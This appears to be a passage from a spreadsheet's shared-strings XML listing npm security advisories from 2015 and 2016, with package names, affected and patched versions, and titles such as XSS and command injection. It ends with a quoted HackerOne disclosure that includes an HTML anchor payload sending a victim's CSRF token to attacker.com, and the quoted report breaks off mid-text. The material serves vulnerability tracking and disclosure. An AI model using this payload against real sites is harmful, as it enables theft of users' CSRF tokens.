  <si>
    <t>https://www.npmjs.com/sails</t>
  </si>
  <si>
    <t>&lt;=0.12.7</t>
  </si>
  <si>
    <t>&gt;0.12.7</t>
  </si>
  <si>
    <t>/advisories/144</t>
  </si>
  <si>
    <t>2016-10-17T16:20:45+00:00</t>
  </si>
  <si>
    <t>reduce-css-calc</t>
  </si>
  <si>
    <t>https://www.npmjs.com/reduce-css-calc</t>
  </si>
  <si>
    <t>&lt;=1.2.4</t>
  </si>
  <si>
    <t>&gt;=1.2.5</t>
  </si>
  <si>
    <t>XSS in autoescape mode</t>
  </si>
  <si>
    <t>/advisories/147</t>
  </si>
  <si>
    <t>2016-10-17T16:20:29+00:00</t>
  </si>
  <si>
    <t>nunjucks</t>
  </si>
  <si>
    <t>https://www.npmjs.com/nunjucks</t>
  </si>
  <si>
    <t>&lt;=2.4.2</t>
  </si>
  <si>
    <t>&gt;=2.4.3</t>
  </si>
  <si>
    <t>/advisories/143</t>
  </si>
  <si>
    <t>2016-10-17T16:20:12+00:00</t>
  </si>
  <si>
    <t>pouchdb</t>
  </si>
  <si>
    <t>https://www.npmjs.com/pouchdb</t>
  </si>
  <si>
    <t>&lt;=6.0.4</t>
  </si>
  <si>
    <t>&gt;=6.0.5</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS)</t>
  </si>
  <si>
    <t>/advisories/145</t>
  </si>
  <si>
    <t>2016-10-17T16:19:18+00:00</t>
  </si>
  <si>
    <t>plotly.js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/plotly.js</t>
  </si>
  <si>
    <t>&lt;1.10.4 || &gt;=1.11.0 &lt;1.16.0</t>
  </si>
  <si>
    <t>&gt;=1.10.4 &lt;1.11.0 || &gt;=1.16.0</t>
  </si>
  <si>
    <t>/advisories/149</t>
  </si>
  <si>
    <t>2016-10-17T16:18:55+00:00</t>
  </si>
  <si>
    <t>uws</t>
  </si>
  <si>
    <t>https://www.npmjs.com/uws</t>
  </si>
  <si>
    <t>&gt;=0.10.0 &lt;=0.10.8</t>
  </si>
  <si>
    <t>&gt;=0.10.9</t>
  </si>
  <si>
    <t>Timing attack vulnerability</t>
  </si>
  <si>
    <t>/advisories/134</t>
  </si>
  <si>
    <t>2016-08-29T14:27:47+00:00</t>
  </si>
  <si>
    <t>cookie-signature</t>
  </si>
  <si>
    <t>https://www.npmjs.com/cookie-signature</t>
  </si>
  <si>
    <t>/advisories/140</t>
  </si>
  <si>
    <t>2016-08-26T17:28:19+00:00</t>
  </si>
  <si>
    <t>&lt;=0.3.13</t>
  </si>
  <si>
    <t>/advisories/139</t>
  </si>
  <si>
    <t>2016-08-26T17:28:01+00:00</t>
  </si>
  <si>
    <t>pivottable</t>
  </si>
  <si>
    <t>https://www.npmjs.com/pivottable</t>
  </si>
  <si>
    <t>&gt;=1.4.0 &lt;2.0.0</t>
  </si>
  <si>
    <t>XSS via tooltips</t>
  </si>
  <si>
    <t>/advisories/138</t>
  </si>
  <si>
    <t>2016-08-26T17:27:49+00:00</t>
  </si>
  <si>
    <t>c3</t>
  </si>
  <si>
    <t>https://www.npmjs.com/c3</t>
  </si>
  <si>
    <t>&lt;=0.4.10</t>
  </si>
  <si>
    <t>&gt;=0.4.11</t>
  </si>
  <si>
    <t>XSS in URL Query String Parameter</t>
  </si>
  <si>
    <t>/advisories/137</t>
  </si>
  <si>
    <t>2016-08-15T18:37:50+00:00</t>
  </si>
  <si>
    <t>swagger-ui</t>
  </si>
  <si>
    <t>https://www.npmjs.com/swagger-ui</t>
  </si>
  <si>
    <t>2.1.0-M1 || 2.1.0-M2</t>
  </si>
  <si>
    <t>Spoofing attack due to unvalidated KDC</t>
  </si>
  <si>
    <t>/advisories/136</t>
  </si>
  <si>
    <t>2016-08-04T21:27:06+00:00</t>
  </si>
  <si>
    <t>node-krb5</t>
  </si>
  <si>
    <t>https://www.npmjs.com/node-krb5</t>
  </si>
  <si>
    <t>XSS - Sanitization not applied recursively</t>
  </si>
  <si>
    <t>/advisories/135</t>
  </si>
  <si>
    <t>2016-08-01T18:02:31+00:00</t>
  </si>
  <si>
    <t>&lt;=1.4.2</t>
  </si>
  <si>
    <t>Insecure Defaults Leads to Potential MITM</t>
  </si>
  <si>
    <t>/advisories/114</t>
  </si>
  <si>
    <t>2016-07-29T22:27:11+00:00</t>
  </si>
  <si>
    <t>ezseed-transmission</t>
  </si>
  <si>
    <t>https://www.npmjs.com/ezseed-transmission</t>
  </si>
  <si>
    <t>&gt;= 0.0.10 &lt;= 0.0.14</t>
  </si>
  <si>
    <t>&gt;= 0.0.15</t>
  </si>
  <si>
    <t>/advisories/88</t>
  </si>
  <si>
    <t>2016-07-26T17:21:17+00:00</t>
  </si>
  <si>
    <t>jws</t>
  </si>
  <si>
    <t>https://www.npmjs.com/jws</t>
  </si>
  <si>
    <t>XSS in Pillbox</t>
  </si>
  <si>
    <t>/advisories/133</t>
  </si>
  <si>
    <t>2016-07-25T17:04:28+00:00</t>
  </si>
  <si>
    <t>fuelux</t>
  </si>
  <si>
    <t>https://www.npmjs.com/fuelux</t>
  </si>
  <si>
    <t>&gt;3.15.7</t>
  </si>
  <si>
    <t>&lt;=3.15.7</t>
  </si>
  <si>
    <t>XSS in drag and drop node</t>
  </si>
  <si>
    <t>/advisories/132</t>
  </si>
  <si>
    <t>2016-07-25T16:25:39+00:00</t>
  </si>
  <si>
    <t>jqtree</t>
  </si>
  <si>
    <t>https://www.npmjs.com/jqtree</t>
  </si>
  <si>
    <t>&lt;=1.3.3</t>
  </si>
  <si>
    <t>&gt;=1.3.4</t>
  </si>
  <si>
    <t>XSS via Content-type header</t>
  </si>
  <si>
    <t>/advisories/131</t>
  </si>
  <si>
    <t>2016-07-25T16:25:23+00:00</t>
  </si>
  <si>
    <t>2.1.4</t>
  </si>
  <si>
    <t>&gt;=2.1.5</t>
  </si>
  <si>
    <t>XSS in primary functions</t>
  </si>
  <si>
    <t>/advisories/129</t>
  </si>
  <si>
    <t>2016-07-25T16:25:00+00:00</t>
  </si>
  <si>
    <t>emojione</t>
  </si>
  <si>
    <t>https://www.npmjs.com/emojione</t>
  </si>
  <si>
    <t>&lt;=1.3.0</t>
  </si>
  <si>
    <t>XSS in client rendered block templates</t>
  </si>
  <si>
    <t>/advisories/128</t>
  </si>
  <si>
    <t>2016-07-25T16:24:38+00:00</t>
  </si>
  <si>
    <t>rendr</t>
  </si>
  <si>
    <t>https://www.npmjs.com/rendr</t>
  </si>
  <si>
    <t>&lt;=1.1.3</t>
  </si>
  <si>
    <t>ReDoS via long string of semicolons</t>
  </si>
  <si>
    <t>/advisories/130</t>
  </si>
  <si>
    <t>2016-07-22T19:49:26+00:00</t>
  </si>
  <si>
    <t>&gt;=0.9.7 &lt;=2.2.2</t>
  </si>
  <si>
    <t>&gt;=2.3.0</t>
  </si>
  <si>
    <t>XSS in dialog closeText</t>
  </si>
  <si>
    <t>/advisories/127</t>
  </si>
  <si>
    <t>2016-07-21T22:21:41+00:00</t>
  </si>
  <si>
    <t>jquery-ui</t>
  </si>
  <si>
    <t>https://www.npmjs.com/jquery-ui</t>
  </si>
  <si>
    <t>&lt;=1.11.4</t>
  </si>
  <si>
    <t>&gt;=1.12.0</t>
  </si>
  <si>
    <t>XSS in key names</t>
  </si>
  <si>
    <t>/advisories/126</t>
  </si>
  <si>
    <t>2016-07-21T20:38:25+00:00</t>
  </si>
  <si>
    <t>&lt;=2.2.0</t>
  </si>
  <si>
    <t>&gt;=2.2.1</t>
  </si>
  <si>
    <t>DOM-based XSS</t>
  </si>
  <si>
    <t>/advisories/125</t>
  </si>
  <si>
    <t>2016-07-21T14:59:33+00:00</t>
  </si>
  <si>
    <t>gmail-js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/gmail-js</t>
  </si>
  <si>
    <t>&lt;=0.6.4</t>
  </si>
  <si>
    <t>&gt;=0.6.5</t>
  </si>
  <si>
    <t>XSS in itemTitle parameter</t>
  </si>
  <si>
    <t>/advisories/124</t>
  </si>
  <si>
    <t>2016-07-20T21:20:51+00:00</t>
  </si>
  <si>
    <t>bootstrap-tagsinput</t>
  </si>
  <si>
    <t>https://www.npmjs.com/bootstrap-tagsinput</t>
  </si>
  <si>
    <t>&lt;=0.8.0</t>
  </si>
  <si>
    <t>XSS in Consumes/Produces Parameter</t>
  </si>
  <si>
    <t>/advisories/123</t>
  </si>
  <si>
    <t>2016-07-20T19:01:30+00:00</t>
  </si>
  <si>
    <t>SQL Injection via GeoJSON</t>
  </si>
  <si>
    <t>/advisories/122</t>
  </si>
  <si>
    <t>2016-07-18T20:40:51+00:00</t>
  </si>
  <si>
    <t>&lt;3.23.6</t>
  </si>
  <si>
    <t>&gt;=3.23.6</t>
  </si>
  <si>
    <t>Invalid input to route validation rules</t>
  </si>
  <si>
    <t>/advisories/121</t>
  </si>
  <si>
    <t>2016-07-05T18:05:37+00:00</t>
  </si>
  <si>
    <t>call</t>
  </si>
  <si>
    <t>https://www.npmjs.com/call</t>
  </si>
  <si>
    <t>&gt;= 2.0.1 &lt;3.0.2</t>
  </si>
  <si>
    <t>&gt;=3.0.2</t>
  </si>
  <si>
    <t>DoS due to excessively large websocket message</t>
  </si>
  <si>
    <t>/advisories/120</t>
  </si>
  <si>
    <t>2016-06-24T17:13:33+00:00</t>
  </si>
  <si>
    <t>&lt;=1.1.0</t>
  </si>
  <si>
    <t>&gt;=1.1.1</t>
  </si>
  <si>
    <t>Potential Command Injection</t>
  </si>
  <si>
    <t>/advisories/117</t>
  </si>
  <si>
    <t>2016-06-21T17:40:40+00:00</t>
  </si>
  <si>
    <t>shell-quote</t>
  </si>
  <si>
    <t>https://www.npmjs.com/shell-quote</t>
  </si>
  <si>
    <t>&lt;=1.6.0</t>
  </si>
  <si>
    <t>&gt;=1.6.1</t>
  </si>
  <si>
    <t>/advisories/118</t>
  </si>
  <si>
    <t>2016-06-20T15:52:52+00:00</t>
  </si>
  <si>
    <t>minimatch</t>
  </si>
  <si>
    <t>https://www.npmjs.com/minimatch</t>
  </si>
  <si>
    <t>&lt;=3.0.1</t>
  </si>
  <si>
    <t>/advisories/106</t>
  </si>
  <si>
    <t>2016-06-16T17:36:06+00:00</t>
  </si>
  <si>
    <t>negotiator</t>
  </si>
  <si>
    <t>https://www.npmjs.com/negotiator</t>
  </si>
  <si>
    <t>&lt;= 0.6.0</t>
  </si>
  <si>
    <t>&gt;= 0.6.1</t>
  </si>
  <si>
    <t>Arbitrary File Write</t>
  </si>
  <si>
    <t>/advisories/95</t>
  </si>
  <si>
    <t>2016-06-15T23:22:22+00:00</t>
  </si>
  <si>
    <t>cli</t>
  </si>
  <si>
    <t>https://www.npmjs.com/cli</t>
  </si>
  <si>
    <t>/advisories/108</t>
  </si>
  <si>
    <t>2016-05-23T17:50:20+00:00</t>
  </si>
  <si>
    <t>backbone</t>
  </si>
  <si>
    <t>https://www.npmjs.com/backbone</t>
  </si>
  <si>
    <t>&lt;= 0.3.3</t>
  </si>
  <si>
    <t>&gt;= 0.5.0</t>
  </si>
  <si>
    <t>/advisories/107</t>
  </si>
  <si>
    <t>2016-05-23T16:48:27+00:00</t>
  </si>
  <si>
    <t>dojo</t>
  </si>
  <si>
    <t>https://www.npmjs.com/dojo</t>
  </si>
  <si>
    <t>&lt;= 1.0</t>
  </si>
  <si>
    <t>&gt;= 1.1</t>
  </si>
  <si>
    <t>Insecure Defaults Allow MITM Over TLS</t>
  </si>
  <si>
    <t>/advisories/99</t>
  </si>
  <si>
    <t>2016-04-26T16:24:32+00:00</t>
  </si>
  <si>
    <t>engine.io-client</t>
  </si>
  <si>
    <t>https://www.npmjs.com/engine.io-client</t>
  </si>
  <si>
    <t>&lt;= 1.6.8</t>
  </si>
  <si>
    <t>&gt;= 1.6.9</t>
  </si>
  <si>
    <t>Non-Constant Time String Comparison</t>
  </si>
  <si>
    <t>/advisories/94</t>
  </si>
  <si>
    <t>2016-04-23T03:42:03+00:00</t>
  </si>
  <si>
    <t>csrf-lite</t>
  </si>
  <si>
    <t>https://www.npmjs.com/csrf-lite</t>
  </si>
  <si>
    <t>&lt;=0.1.1</t>
  </si>
  <si>
    <t>&gt;=0.1.2</t>
  </si>
  <si>
    <t>SSL Validation Defaults to False</t>
  </si>
  <si>
    <t>/advisories/104</t>
  </si>
  <si>
    <t>2016-04-22T15:56:50+00:00</t>
  </si>
  <si>
    <t>electron-packager</t>
  </si>
  <si>
    <t>https://www.npmjs.com/electron-packager</t>
  </si>
  <si>
    <t>&gt;= 5.2.1 &lt;= 6.0.0 || &gt;=6.0.0 &lt;= 6.0.2</t>
  </si>
  <si>
    <t>&gt;= 7.0.0</t>
  </si>
  <si>
    <t>Private Data Disclosure</t>
  </si>
  <si>
    <t>/advisories/92</t>
  </si>
  <si>
    <t>2016-04-19T23:24:17+00:00</t>
  </si>
  <si>
    <t>express-restify-mongoose</t>
  </si>
  <si>
    <t>https://www.npmjs.com/express-restify-mongoose</t>
  </si>
  <si>
    <t>&lt;= 2.4.2 || &gt;= 3.0.0 &lt;=3.0.1</t>
  </si>
  <si>
    <t>&gt;=2.5.0 &lt;= 3.0.0 || &gt;=3.1.0</t>
  </si>
  <si>
    <t>Authentication Bypass</t>
  </si>
  <si>
    <t>/advisories/90</t>
  </si>
  <si>
    <t>2016-04-18T21:17:58+00:00</t>
  </si>
  <si>
    <t>console-io</t>
  </si>
  <si>
    <t>https://www.npmjs.com/console-io</t>
  </si>
  <si>
    <t>&lt;=2.2.13</t>
  </si>
  <si>
    <t>npm Token Leak</t>
  </si>
  <si>
    <t>/advisories/98</t>
  </si>
  <si>
    <t>2016-04-18T21:16:44+00:00</t>
  </si>
  <si>
    <t>&lt;= 2.15.0 || &gt;= 3.0.0 &lt;= 3.8.2</t>
  </si>
  <si>
    <t>&gt;= 2.15.1 &lt;= 3.0.0 || &gt;= 3.8.3</t>
  </si>
  <si>
    <t>Sanitization bypass using HTML Entities</t>
  </si>
  <si>
    <t>/advisories/101</t>
  </si>
  <si>
    <t>2016-04-18T16:45:00+00:00</t>
  </si>
  <si>
    <t>&lt;=0.3.5</t>
  </si>
  <si>
    <t>&gt;=0.3.6</t>
  </si>
  <si>
    <t>Template Injection</t>
  </si>
  <si>
    <t>/advisories/97</t>
  </si>
  <si>
    <t>2016-03-30T22:25:57+00:00</t>
  </si>
  <si>
    <t>jsrender</t>
  </si>
  <si>
    <t>https://www.npmjs.com/jsrender</t>
  </si>
  <si>
    <t>&lt;=0.9.73</t>
  </si>
  <si>
    <t>&gt;=0.9.74</t>
  </si>
  <si>
    <t>Insecure Default Configuration</t>
  </si>
  <si>
    <t>/advisories/96</t>
  </si>
  <si>
    <t>2016-03-28T22:48:46+00:00</t>
  </si>
  <si>
    <t>airbrake</t>
  </si>
  <si>
    <t>https://www.npmjs.com/airbrake</t>
  </si>
  <si>
    <t>&lt;=0.3.8</t>
  </si>
  <si>
    <t>&gt;=0.4.0</t>
  </si>
  <si>
    <t>No CSRF Validation</t>
  </si>
  <si>
    <t>/advisories/91</t>
  </si>
  <si>
    <t>2016-03-28T22:40:54+00:00</t>
  </si>
  <si>
    <t>droppy</t>
  </si>
  <si>
    <t>https://www.npmjs.com/droppy</t>
  </si>
  <si>
    <t>&lt;3.5.0</t>
  </si>
  <si>
    <t>&gt;=3.5.0</t>
  </si>
  <si>
    <t>/advisories/89</t>
  </si>
  <si>
    <t>2016-03-28T22:21:23+00:00</t>
  </si>
  <si>
    <t>restafary</t>
  </si>
  <si>
    <t>https://www.npmjs.com/restafary</t>
  </si>
  <si>
    <t>&lt;1.6.1</t>
  </si>
  <si>
    <t>Insecure Entropy Source - Math.random()</t>
  </si>
  <si>
    <t>/advisories/93</t>
  </si>
  <si>
    <t>2016-03-28T21:29:30+00:00</t>
  </si>
  <si>
    <t>node-uuid</t>
  </si>
  <si>
    <t>https://www.npmjs.com/node-uuid</t>
  </si>
  <si>
    <t>&lt;1.4.4</t>
  </si>
  <si>
    <t>/advisories/86</t>
  </si>
  <si>
    <t>2016-03-21T21:27:58.413+00:00</t>
  </si>
  <si>
    <t>riot-compiler</t>
  </si>
  <si>
    <t>https://www.npmjs.com/riot-compiler</t>
  </si>
  <si>
    <t>2.3.21</t>
  </si>
  <si>
    <t>&gt;2.3.21</t>
  </si>
  <si>
    <t>Authentication credentails logged in clear text</t>
  </si>
  <si>
    <t>/advisories/85</t>
  </si>
  <si>
    <t>2016-03-16T16:29:31.778+00:00</t>
  </si>
  <si>
    <t>grunt-gh-pages</t>
  </si>
  <si>
    <t>https://www.npmjs.com/grunt-gh-pages</t>
  </si>
  <si>
    <t>&lt;=0.9.1</t>
  </si>
  <si>
    <t>Authentication Bypass in Try Mode</t>
  </si>
  <si>
    <t>/advisories/81</t>
  </si>
  <si>
    <t>2016-01-28T07:56:52.379+00:00</t>
  </si>
  <si>
    <t>hapi-auth-jwt2</t>
  </si>
  <si>
    <t>https://www.npmjs.com/hapi-auth-jwt2</t>
  </si>
  <si>
    <t>5.1.1</t>
  </si>
  <si>
    <t>&gt;=5.1.2</t>
  </si>
  <si>
    <t>/advisories/55</t>
  </si>
  <si>
    <t>2016-01-26T20:04:21.225+00:00</t>
  </si>
  <si>
    <t>&lt;2.11.2</t>
  </si>
  <si>
    <t>&gt;=2.11.2</t>
  </si>
  <si>
    <t>Denial of Service and Content Injection</t>
  </si>
  <si>
    <t>/advisories/80</t>
  </si>
  <si>
    <t>2016-01-25T17:56:55.455+00:00</t>
  </si>
  <si>
    <t>i18n-node-angular</t>
  </si>
  <si>
    <t>https://www.npmjs.com/i18n-node-angular</t>
  </si>
  <si>
    <t>/advisories/77</t>
  </si>
  <si>
    <t>2016-01-19T21:51:35.396+00:00</t>
  </si>
  <si>
    <t>hawk</t>
  </si>
  <si>
    <t>https://www.npmjs.com/hawk</t>
  </si>
  <si>
    <t>&lt; 3.1.3  || &gt;= 4.0.0 &lt;4.1.1</t>
  </si>
  <si>
    <t>&gt;=3.1.3 &lt; 4.0.0 || &gt;=4.1.1</t>
  </si>
  <si>
    <t>/advisories/76</t>
  </si>
  <si>
    <t>2016-01-18T04:29:55.903+00:00</t>
  </si>
  <si>
    <t>&lt;=2.12.3</t>
  </si>
  <si>
    <t>&gt;=2.12.4</t>
  </si>
  <si>
    <t>/advisories/75</t>
  </si>
  <si>
    <t>2016-01-15T17:01:49.053+00:00</t>
  </si>
  <si>
    <t>mqtt-packet</t>
  </si>
  <si>
    <t>https://www.npmjs.com/mqtt-packet</t>
  </si>
  <si>
    <t>&lt;3.4.6 || &gt; 4.0.0 &lt;4.0.5</t>
  </si>
  <si>
    <t>&gt;=3.4.6 &lt; 4.0.0|| &gt;=4.0.5</t>
  </si>
  <si>
    <t>Content Injection via TileJSON Name</t>
  </si>
  <si>
    <t>/advisories/74</t>
  </si>
  <si>
    <t>2016-01-12T23:35:56.853+00:00</t>
  </si>
  <si>
    <t>mapbox.js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/mapbox.js</t>
  </si>
  <si>
    <t>&lt;1.6.6 || &lt; 2.2.4 &gt; 2.0.0</t>
  </si>
  <si>
    <t>&gt;=1.6.6 &lt;2.0.0 || &gt;= 2.2.4</t>
  </si>
  <si>
    <t>/advisories/53</t>
  </si>
  <si>
    <t>2016-01-05T23:05:18.308+00:00</t>
  </si>
  <si>
    <t>jshamcrest</t>
  </si>
  <si>
    <t>https://www.npmjs.com/jshamcrest</t>
  </si>
  <si>
    <t>/advisories/52</t>
  </si>
  <si>
    <t>2016-01-05T23:00:45.777+00:00</t>
  </si>
  <si>
    <t>jadedown</t>
  </si>
  <si>
    <t>https://www.npmjs.com/jadedown</t>
  </si>
  <si>
    <t>Remote Memory Disclosure</t>
  </si>
  <si>
    <t>/advisories/68</t>
  </si>
  <si>
    <t>2016-01-04T19:52:32.207+00:00</t>
  </si>
  <si>
    <t>bittorrent-dht</t>
  </si>
  <si>
    <t>https://www.npmjs.com/bittorrent-dht</t>
  </si>
  <si>
    <t>&lt;5.1.3</t>
  </si>
  <si>
    <t>&gt;=5.1.3</t>
  </si>
  <si>
    <t>/advisories/67</t>
  </si>
  <si>
    <t>2016-01-04T19:34:19.734+00:00</t>
  </si>
  <si>
    <t>&lt;= 1.0.0</t>
  </si>
  <si>
    <t>&gt;= 1.0.1</t>
  </si>
  <si>
    <t>SQL Injection due to unescaped object keys</t>
  </si>
  <si>
    <t>/advisories/66</t>
  </si>
  <si>
    <t>2015-12-28T18:37:37.178+00:00</t>
  </si>
  <si>
    <t>&lt;=v2.0.0-alpha7</t>
  </si>
  <si>
    <t>&gt;=v2.0.0-alpha8</t>
  </si>
  <si>
    <t>Route level CORS config overrides connection level defaults</t>
  </si>
  <si>
    <t>/advisories/65</t>
  </si>
  <si>
    <t>2015-12-28T17:17:36.462+00:00</t>
  </si>
  <si>
    <t>&lt;11.1.4</t>
  </si>
  <si>
    <t>&gt;=11.1.4</t>
  </si>
  <si>
    <t>Denial of Service - Illegal access crash from if-modified-since header</t>
  </si>
  <si>
    <t>/advisories/64</t>
  </si>
  <si>
    <t>2015-12-23T23:21:25.322+00:00</t>
  </si>
  <si>
    <t>Denial of service - Potential socket exhaustion</t>
  </si>
  <si>
    <t>/advisories/63</t>
  </si>
  <si>
    <t>2015-12-23T23:17:51.134+00:00</t>
  </si>
  <si>
    <t>&lt;11.1.3</t>
  </si>
  <si>
    <t>&gt;=11.1.3</t>
  </si>
  <si>
    <t>Quoteless Attributes in Templates can lead to Content Injection</t>
  </si>
  <si>
    <t>/advisories/62</t>
  </si>
  <si>
    <t>2015-12-14T17:13:57.565+00:00</t>
  </si>
  <si>
    <t>mustache</t>
  </si>
  <si>
    <t>https://www.npmjs.com/mustache</t>
  </si>
  <si>
    <t>&lt;2.2.1</t>
  </si>
  <si>
    <t>/advisories/61</t>
  </si>
  <si>
    <t>2015-12-14T16:52:07.962+00:00</t>
  </si>
  <si>
    <t>handlebars</t>
  </si>
  <si>
    <t>https://www.npmjs.com/handlebars</t>
  </si>
  <si>
    <t>&lt;4.0.0</t>
  </si>
  <si>
    <t>&gt;=4.0.0</t>
  </si>
  <si>
    <t>Authentication Weakness</t>
  </si>
  <si>
    <t>/advisories/60</t>
  </si>
  <si>
    <t>2015-12-04T17:52:25.832+00:00</t>
  </si>
  <si>
    <t>keystone</t>
  </si>
  <si>
    <t>https://www.npmjs.com/keystone</t>
  </si>
  <si>
    <t>&lt;0.3.16</t>
  </si>
  <si>
    <t>&gt;=0.3.16</t>
  </si>
  <si>
    <t>/advisories/59</t>
  </si>
  <si>
    <t>2015-11-20T18:52:47.394+00:00</t>
  </si>
  <si>
    <t>milliseconds</t>
  </si>
  <si>
    <t>https://www.npmjs.com/milliseconds</t>
  </si>
  <si>
    <t>&lt;0.1.2</t>
  </si>
  <si>
    <t>Symlink Arbitrary File Overwrite</t>
  </si>
  <si>
    <t>/advisories/57</t>
  </si>
  <si>
    <t>2015-11-03T07:15:12.9+00:00</t>
  </si>
  <si>
    <t>tar</t>
  </si>
  <si>
    <t>https://www.npmjs.com/tar</t>
  </si>
  <si>
    <t>Root Path Disclosure</t>
  </si>
  <si>
    <t>/advisories/56</t>
  </si>
  <si>
    <t>2015-11-03T07:12:20.676+00:00</t>
  </si>
  <si>
    <t>send</t>
  </si>
  <si>
    <t>https://www.npmjs.com/send</t>
  </si>
  <si>
    <t>&lt;0.11.1</t>
  </si>
  <si>
    <t>&gt;=0.11.1</t>
  </si>
  <si>
    <t>Command Injection in gm.compare function</t>
  </si>
  <si>
    <t>/advisories/54</t>
  </si>
  <si>
    <t>2015-10-26T20:12:18.99+00:00</t>
  </si>
  <si>
    <t>gm</t>
  </si>
  <si>
    <t>https://www.npmjs.com/gm</t>
  </si>
  <si>
    <t>&lt;=1.20.0</t>
  </si>
  <si>
    <t>&gt;=1.21.1</t>
  </si>
  <si>
    <t>/advisories/51</t>
  </si>
  <si>
    <t>2015-10-25T01:35:01.611+00:00</t>
  </si>
  <si>
    <t>ansi2html</t>
  </si>
  <si>
    <t>https://www.npmjs.com/ansi2html</t>
  </si>
  <si>
    <t>/advisories/48</t>
  </si>
  <si>
    <t>2015-10-24T21:01:32.155+00:00</t>
  </si>
  <si>
    <t>uglify-js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/uglify-js</t>
  </si>
  <si>
    <t>&lt;2.6.0</t>
  </si>
  <si>
    <t>&gt;=2.6.0</t>
  </si>
  <si>
    <t>Insecure Comparison</t>
  </si>
  <si>
    <t>/advisories/50</t>
  </si>
  <si>
    <t>2015-10-24T21:00:53.201+00:00</t>
  </si>
  <si>
    <t>secure-compare</t>
  </si>
  <si>
    <t>https://www.npmjs.com/secure-compare</t>
  </si>
  <si>
    <t>&lt;=3.0.0</t>
  </si>
  <si>
    <t>&gt;3.0.0</t>
  </si>
  <si>
    <t>Content Injection via TileJSON attribute</t>
  </si>
  <si>
    <t>/advisories/49</t>
  </si>
  <si>
    <t>2015-10-24T21:00:40.189+00:00</t>
  </si>
  <si>
    <t>&lt;1.6.5 || &lt; 2.1.7 &gt; 2.0.0</t>
  </si>
  <si>
    <t>&gt;=1.6.5 &lt;2.0.0 || &gt;= 2.1.7</t>
  </si>
  <si>
    <t>/advisories/47</t>
  </si>
  <si>
    <t>2015-10-24T20:46:42.522+00:00</t>
  </si>
  <si>
    <t>bleach</t>
  </si>
  <si>
    <t>https://www.npmjs.com/bleach</t>
  </si>
  <si>
    <t>/advisories/46</t>
  </si>
  <si>
    <t>2015-10-24T20:39:59.852+00:00</t>
  </si>
  <si>
    <t>ms</t>
  </si>
  <si>
    <t>https://www.npmjs.com/ms</t>
  </si>
  <si>
    <t>&gt;0.7.0</t>
  </si>
  <si>
    <t>Incorrect handling of CORS preflight request headers</t>
  </si>
  <si>
    <t>/advisories/45</t>
  </si>
  <si>
    <t>2015-10-20T18:29:09.702+00:00</t>
  </si>
  <si>
    <t>&lt;11.0.0</t>
  </si>
  <si>
    <t>&gt;=11.0.0</t>
  </si>
  <si>
    <t>LDAP Injection</t>
  </si>
  <si>
    <t>/advisories/19</t>
  </si>
  <si>
    <t>2015-09-18T19:30:10+00:00</t>
  </si>
  <si>
    <t>ldapauth</t>
  </si>
  <si>
    <t>https://www.npmjs.com/ldapauth</t>
  </si>
  <si>
    <t>&lt;=2.2.4</t>
  </si>
  <si>
    <t>/advisories/18</t>
  </si>
  <si>
    <t>2015-09-18T19:29:10+00:00</t>
  </si>
  <si>
    <t>ldapauth-fork</t>
  </si>
  <si>
    <t>https://www.npmjs.com/ldapauth-fork</t>
  </si>
  <si>
    <t>&lt; 2.3.3</t>
  </si>
  <si>
    <t>&gt;= 2.3.3</t>
  </si>
  <si>
    <t>/advisories/5</t>
  </si>
  <si>
    <t>datatables</t>
  </si>
  <si>
    <t>https://www.npmjs.com/datatables</t>
  </si>
  <si>
    <t>&lt;=1.10.8</t>
  </si>
  <si>
    <t>&gt;1.10.8</t>
  </si>
  <si>
    <t>Incorrect Handling of Non-Boolean Comparisons During Minification</t>
  </si>
  <si>
    <t>/advisories/39</t>
  </si>
  <si>
    <t>2015-08-24T19:29:10+00:00</t>
  </si>
  <si>
    <t>&lt;= 2.4.23</t>
  </si>
  <si>
    <t>&gt;= 2.4.24</t>
  </si>
  <si>
    <t>/advisories/10</t>
  </si>
  <si>
    <t>2015-07-27T23:33:48+00:00</t>
  </si>
  <si>
    <t>geddy</t>
  </si>
  <si>
    <t>https://www.npmjs.com/geddy</t>
  </si>
  <si>
    <t>&lt;13.0.8</t>
  </si>
  <si>
    <t>&gt;=13.0.8</t>
  </si>
  <si>
    <t>rails-ujs will send CSRF tokens to other origins</t>
  </si>
  <si>
    <t>/advisories/15</t>
  </si>
  <si>
    <t>2015-06-24T09:00:00+00:00</t>
  </si>
  <si>
    <t>jquery-ujs</t>
  </si>
  <si>
    <t>https://www.npmjs.com/jquery-ujs</t>
  </si>
  <si>
    <t>&lt;= 1.0.3</t>
  </si>
  <si>
    <t>&gt;= 1.0.4</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/49935.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I reported this via email a few months ago. Here was my initial email:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Hello,&lt;br&gt;
I&amp;#39;ve been playing with getting Rails apps to send CSRF tokens to the wrong domains and I found a few problems. The main motivation for this is in attacking a site that uses Content Security Policy. With CSP enabled, an attacker with an XSS vulnerability cannot simply inject inline JavaScript, but they can still abuse some Rails features to steal a CSRF token.&lt;/p&gt;
&lt;p&gt;In the scenario where an attacker can inject arbitrary HTML into the response, the simplest attack would be to inject:&lt;/p&gt;
&lt;p&gt;&amp;lt;a href=&amp;quot;https://attacker.com&amp;quot; data-remote data-method=&amp;quot;post&amp;quot; data-cross-domain=&amp;quot;false&amp;quot;&amp;gt;&lt;/p&gt;
&lt;p&gt;Clicking on this link will trigger an OPTIONS request to attacker.com. If the attacker returns the correct CORS headers, a POST request containing the user&amp;#39;s CSRF token will be sent to attacker.com.&lt;/p&gt;
&lt;p&gt;In a second scenario, an attacker might be able to control only the href attribute of an anchor tag or the action attribute of a form tag that will trigger a data-remote action. This isn&amp;#39;t uncommon to see if the site is building anchor or form tags dynamically. In this case, the attacker can set the href or action to &amp;quot; &lt;a title="https://attacker.com" href="/redirect?signature=f41748796237a967ca0cc1791576d43d91bed230&amp;amp;url=https%3A%2F%2Fattacker.com" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://attacker.com&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&amp;quot;. This will be passed to JQuery, who will see this as a same origin request.&lt;/p&gt;
